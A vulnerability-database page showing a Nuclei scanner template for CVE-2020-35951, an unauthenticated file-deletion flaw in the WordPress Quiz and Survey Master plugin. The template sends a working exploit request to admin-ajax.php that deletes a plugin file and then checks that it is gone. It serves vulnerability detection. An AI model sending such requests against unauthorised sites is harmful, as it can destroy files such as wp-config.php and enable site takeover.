| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2020-35951 | 1 Jan 202107:32 | – | circl | |
| WordPress Quiz and Survey Master plugin security vulnerability | 31 Dec 202000:00 | – | cnnvd | |
| CVE-2020-35951 | 1 Jan 202103:27 | – | cve | |
| CVE-2020-35951 | 1 Jan 202103:27 | – | cvelist | |
| CVE-2020-35951 | 1 Jan 202104:15 | – | nvd | |
| CVE-2020-35951 | 1 Jan 202104:15 | – | osv | |
| Buffer overflow | 1 Jan 202104:15 | – | prion | |
| CVE-2020-35951 | 5 Feb 202513:15 | – | redhatcve | |
| Quiz And Survey Master Plugin for WordPress < 7.0.1 Multiple Vulnerabilities | 31 Aug 202000:00 | – | nessus | |
| Quiz and Survey Master < 7.0.1 - Unauthenticated Arbitrary File Deletion | 13 Aug 202000:00 | – | wpexploit |
id: CVE-2020-35951
info:
name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
author: princechaddha
severity: critical
description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
impact: |
This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.
remediation: |
Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.
reference:
- https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35951
- https://wpscan.com/vulnerability/10348
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
cvss-score: 9.9
cve-id: CVE-2020-35951
cwe-id: CWE-306
epss-score: 0.76328
epss-percentile: 0.99475
cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 4
vendor: expresstech
product: quiz_and_survey_master
framework: wordpress
tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech,vuln
http:
- raw:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="action"
qsm_remove_file_fd_question
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="file_url"
{{fullpath}}wp-content/plugins/quiz-master-next/README.md
------WebKitFormBoundaryBJ17hSJBjuGrnW92--
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')
- type: word
part: body
words:
- '{"type":"success","message":"File removed successfully"}'
extractors:
- type: regex
name: fullpath
group: 1
regex:
- not found in <b>([/a-z_]+)wp
internal: true
part: body
# digest: 4a0a00473045022100f784b39460105b2b7864352d95f3547c448aeb420ae7af954e6d0acd6f4d94490220740f1a895a4c2b4abc50780ea5340c4457e5c2759f605b7ef1b24acc0b111d46:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation